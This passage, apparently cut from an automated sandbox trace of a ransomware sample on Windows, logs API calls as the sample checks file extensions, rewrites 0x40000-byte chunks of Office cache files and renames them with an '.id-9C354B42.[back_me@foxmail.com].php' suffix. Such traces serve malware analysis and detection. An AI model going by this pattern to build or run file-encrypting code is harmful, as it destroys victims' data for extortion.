lpNewFilePointer=0x0) returned 1 [0040.657] WriteFile (in: hFile=0x1a8, lpBuffer=0x42bc928*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x42bc928*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0040.663] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x227e00, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: lpNewFilePointer=0x0) returned 1 [0040.663] WriteFile (in: hFile=0x1a8, lpBuffer=0x42bc928*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x42bc928*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0040.666] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x42bc928 | out: hHeap=0xb10000) returned 1 [0040.666] CloseHandle (hObject=0x1a8) returned 1 [0041.172] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0041.172] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0041.172] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0041.172] lstrlenW (lpString=".doc") returned 4 [0041.172] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0041.172] lstrlenW (lpString=".docx") returned 5 [0041.172] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0041.172] lstrlenW (lpString=".pdf") returned 4 [0041.173] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0041.173] lstrlenW (lpString=".xls") returned 4 [0041.173] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0041.173] lstrlenW (lpString=".xlsx") returned 5 [0041.173] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0041.173] lstrlenW (lpString=".ppt") returned 4 [0041.173] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0041.173] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0041.173] lstrlenW (lpString=".zip") returned 4 [0041.173] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0041.173] lstrlenW (lpString=".rar") returned 4 [0041.173] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0041.173] lstrlenW (lpString=".bz2") returned 4 [0041.173] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0041.173] lstrlenW (lpString=".7z") returned 3 [0041.173] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0041.173] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0041.173] lstrlenW (lpString=".dbf") returned 4 [0041.173] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0041.173] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0041.173] lstrlenW (lpString=".1cd") returned 4 [0041.173] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0041.173] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0041.173] lstrlenW (lpString=".jpg") returned 4 [0041.173] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0041.173] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0041.173] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0041.173] lstrlenW (lpString=".doc") returned 4 [0041.173] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0041.173] lstrlenW (lpString=".docx") returned 5 [0041.173] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0041.173] lstrlenW (lpString=".pdf") returned 4 [0041.173] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0041.173] lstrlenW (lpString=".xls") returned 4 [0041.174] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0041.174] lstrlenW (lpString=".xlsx") returned 5 [0041.174] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0041.174] lstrlenW (lpString=".ppt") returned 4 [0041.174] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0041.174] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0041.174] lstrlenW (lpString=".zip") returned 4 [0041.174] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0041.174] lstrlenW (lpString=".rar") returned 4 [0041.174] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0041.174] lstrlenW (lpString=".bz2") returned 4 [0041.174] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0041.174] lstrlenW (lpString=".7z") returned 3 [0041.174] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0041.174] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0041.174] lstrlenW (lpString=".dbf") returned 4 [0041.174] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0041.174] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0041.174] lstrlenW (lpString=".1cd") returned 4 [0041.174] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0041.174] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0041.174] lstrlenW (lpString=".jpg") returned 4 [0041.174] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0041.174] lstrcmpiW (lpString1=".cab", lpString2=".php") returned -1 [0041.174] lstrlenW (lpString="Proof.cab") returned 9 [0041.174] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0041.306] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x366ff1c | out: lpFileSize=0x366ff1c*=13642474) returned 1 [0041.306] CloseHandle (hObject=0x1c0) returned 1 [0041.306] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab")) returned 0x2020 [0041.306] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0041.306] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0041.309] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0041.309] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc6c | out: lpNewFilePointer=0x0) returned 1 [0041.309] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0041.309] ReadFile (in: hFile=0x1c0, lpBuffer=0x3fb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x3fb0058*, lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 [0041.314] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x4563a3, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0041.314] ReadFile (in: hFile=0x1c0, lpBuffer=0x3ff0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x3ff0058*, lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 [0041.317] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x366fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0041.317] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0xcc2aea, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0041.317] ReadFile (in: hFile=0x1c0, lpBuffer=0x4030058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x4030058*, lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 [0041.335] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.335] WriteFile (in: hFile=0x1c0, lpBuffer=0x3fb0020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0x366fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesWritten=0x366fcb0*=0xc00fe, lpOverlapped=0x0) returned 1 [0041.753] SetEndOfFile (hFile=0x1c0) returned 1 [0041.753] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x432d940 [0041.893] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: lpNewFilePointer=0x0) returned 1 [0041.894] WriteFile (in: hFile=0x1c0, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0041.895] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x4563a3, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: lpNewFilePointer=0x0) returned 1 [0041.895] WriteFile (in: hFile=0x1c0, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0041.896] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0xcc2aea, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: lpNewFilePointer=0x0) returned 1 [0041.896] WriteFile (in: hFile=0x1c0, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0041.897] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x432d940 | out: hHeap=0xb10000) returned 1 [0041.897] CloseHandle (hObject=0x1c0) returned 1 [0045.191] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0045.191] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0045.191] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0045.191] lstrlenW (lpString=".doc") returned 4 [0045.191] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0045.191] lstrlenW (lpString=".docx") returned 5 [0045.191] lstrcmpiW (lpString1=".docx", lpString2="f.cab") returned -1 [0045.191] lstrlenW (lpString=".pdf") returned 4 [0045.191] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0045.191] lstrlenW (lpString=".xls") returned 4 [0045.191] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0045.191] lstrlenW (lpString=".xlsx") returned 5 [0045.191] lstrcmpiW (lpString1=".xlsx", lpString2="f.cab") returned -1 [0045.191] lstrlenW (lpString=".ppt") returned 4 [0045.191] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0045.191] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0045.191] lstrlenW (lpString=".zip") returned 4 [0045.191] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0045.191] lstrlenW (lpString=".rar") returned 4 [0045.191] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0045.191] lstrlenW (lpString=".bz2") returned 4 [0045.191] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0045.192] lstrlenW (lpString=".7z") returned 3 [0045.192] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0045.192] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0045.192] lstrlenW (lpString=".dbf") returned 4 [0045.192] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0045.192] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0045.192] lstrlenW (lpString=".1cd") returned 4 [0045.192] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0045.192] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0045.192] lstrlenW (lpString=".jpg") returned 4 [0045.192] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0045.192] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0045.192] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0045.192] lstrlenW (lpString=".doc") returned 4 [0045.192] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0045.192] lstrlenW (lpString=".docx") returned 5 [0045.192] lstrcmpiW (lpString1=".docx", lpString2="f.cab") returned -1 [0045.192] lstrlenW (lpString=".pdf") returned 4 [0045.192] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0045.192] lstrlenW (lpString=".xls") returned 4 [0045.192] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0045.192] lstrlenW (lpString=".xlsx") returned 5 [0045.192] lstrcmpiW (lpString1=".xlsx", lpString2="f.cab") returned -1 [0045.192] lstrlenW (lpString=".ppt") returned 4 [0045.192] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0045.192] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0045.192] lstrlenW (lpString=".zip") returned 4 [0045.192] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0045.192] lstrlenW (lpString=".rar") returned 4 [0045.192] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0045.192] lstrlenW (lpString=".bz2") returned 4 [0045.192] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0045.192] lstrlenW (lpString=".7z") returned 3 [0045.192] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0045.193] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0045.193] lstrlenW (lpString=".dbf") returned 4 [0045.193] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0045.193] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0045.193] lstrlenW (lpString=".1cd") returned 4 [0045.193] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0045.193] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0045.193] lstrlenW (lpString=".jpg") returned 4 [0045.193] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0045.193] lstrcmpiW (lpString1=".msi", lpString2=".php") returned -1 [0045.193] lstrlenW (lpString="InfoPathMUI.msi") returned 15 [0045.193] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0045.193] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x366ff1c | out: lpFileSize=0x366ff1c*=3124224) returned 1 [0045.193] CloseHandle (hObject=0x198) returned 1 [0045.193] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi")) returned 0x2020 [0045.193] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0045.194] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0045.194] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0045.194] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc6c | out: lpNewFilePointer=0x0) returned 1 [0045.194] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0045.194] ReadFile (in: hFile=0x198, lpBuffer=0x3fb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x3fb0058*, lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.228] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xfe400, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0045.228] ReadFile (in: hFile=0x198, lpBuffer=0x3ff0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x3ff0058*, lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.236] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x366fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0045.236] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x2bac00, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0045.236] ReadFile (in: hFile=0x198, lpBuffer=0x4030058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x4030058*, lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.252] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.252] WriteFile (in: hFile=0x198, lpBuffer=0x3fb0020*, nNumberOfBytesToWrite=0xc010a, lpNumberOfBytesWritten=0x366fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesWritten=0x366fcb0*=0xc010a, lpOverlapped=0x0) returned 1 [0045.542] SetEndOfFile (hFile=0x198) returned 1 [0045.542] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x432d940 [0045.542] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: lpNewFilePointer=0x0) returned 1 [0045.542] WriteFile (in: hFile=0x198, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.544] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xfe400, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: lpNewFilePointer=0x0) returned 1 [0045.544] WriteFile (in: hFile=0x198, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.548] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x2bac00, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: lpNewFilePointer=0x0) returned 1 [0045.548] WriteFile (in: hFile=0x198, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.550] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x432d940 | out: hHeap=0xb10000) returned 1 [0045.550] CloseHandle (hObject=0x198) returned 1 [0045.551] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0045.551] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0045.551] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0045.551] lstrlenW (lpString=".doc") returned 4 [0045.551] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0045.551] lstrlenW (lpString=".docx") returned 5 [0045.551] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0045.551] lstrlenW (lpString=".pdf") returned 4 [0045.551] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0045.551] lstrlenW (lpString=".xls") returned 4 [0045.551] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0045.551] lstrlenW (lpString=".xlsx") returned 5 [0045.551] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0045.551] lstrlenW (lpString=".ppt") returned 4 [0045.551] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0045.551] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0045.551] lstrlenW (lpString=".zip") returned 4 [0045.551] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0045.551] lstrlenW (lpString=".rar") returned 4 [0045.551] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0045.551] lstrlenW (lpString=".bz2") returned 4 [0045.551] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0045.551] lstrlenW (lpString=".7z") returned 3 [0045.551] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0045.551] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0045.551] lstrlenW (lpString=".dbf") returned 4 [0045.551] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0045.551] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0045.552] lstrlenW (lpString=".1cd") returned 4 [0045.552] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0045.552] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0045.552] lstrlenW (lpString=".jpg") returned 4 [0045.552] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0045.552] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0045.552] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0045.552] lstrlenW (lpString=".doc") returned 4 [0045.552] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0045.552] lstrlenW (lpString=".docx") returned 5 [0045.552] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0045.552] lstrlenW (lpString=".pdf") returned 4 [0045.552] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0045.552] lstrlenW (lpString=".xls") returned 4 [0045.552] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0045.552] lstrlenW (lpString=".xlsx") returned 5 [0045.552] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0045.552] lstrlenW (lpString=".ppt") returned 4 [0045.552] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0045.552] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78 [0045.552] lstrlenW (lpString=".zip") returned 4 [0045.552] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0045.552] lstrlenW (lpString=".rar") returned 4 [0045.552] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0045.552] lstrlenW (lpString=".bz2") returned 4 [0045.552] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0045.552] 